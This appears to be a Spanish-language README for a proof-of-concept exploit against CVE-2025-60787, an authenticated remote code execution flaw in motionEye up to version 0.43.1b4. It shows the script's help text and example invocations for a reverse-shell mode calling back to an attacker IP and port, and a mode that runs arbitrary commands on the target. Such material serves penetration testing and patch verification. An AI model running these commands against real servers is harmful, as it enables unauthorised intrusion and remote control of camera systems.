
PoC automatizado para CVE-2025-60787 que proporciona ejecución remota de código autenticada contra servidores motionEye hasta la versión 0.43.1b4, con modos de shell inversa y ejecución de comandos.
PoC para CVE-2025-60787 que es una vulnerabilidad de RCE autenticado para motionEye con todas las versiones afectadas hasta 0.43.1b4 (incluida).
Este es un PoC automatizado para la vulnerabilidad descrita en este repositorio. Créditos a prabhatverma47.
El script tiene 2 comandos que abusan de la vulnerabilidad. Uno que envía directamente una reverse shell llamado revshell y otro comando llamado command para ejecutar comandos directamente abusando de este CVE.
❯ python3 CVE-2025-60787.py -h
usage: CVE-2025-60787.py [-h] {revshell,command} ...
PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x
positional arguments:
{revshell,command} Choose between send a reverse shell or (attempting to) run commands
revshell Attempt to send a reverse shell using CVE-2025-60787 vuln
command Execute a command remotely using CVE-2025-60787 vuln
options:
-h, --help show this help message and exit
Usa el comando revshell para obtener una shell. Por ejemplo:
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001
Donde 10.10.10.10 es la máquina objetivo (la máquina que ejecuta motionEye), 10.10.10.15 es nuestra máquina atacante y 9001 es el puerto en el que estamos escuchando para capturar una reverse shell.
Si en lugar de una reverse shell queremos ejecutar otros comandos de forma remota, podemos usar la opción command. Por ejemplo, ejecutar el comando ping -c1 10.10.10.15 en la máquina víctima:
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'
Donde 10.10.10.10 es la máquina que ejecuta motionEye.
Usa este script siempre bajo tu propia responsabilidad.
Sé ético (: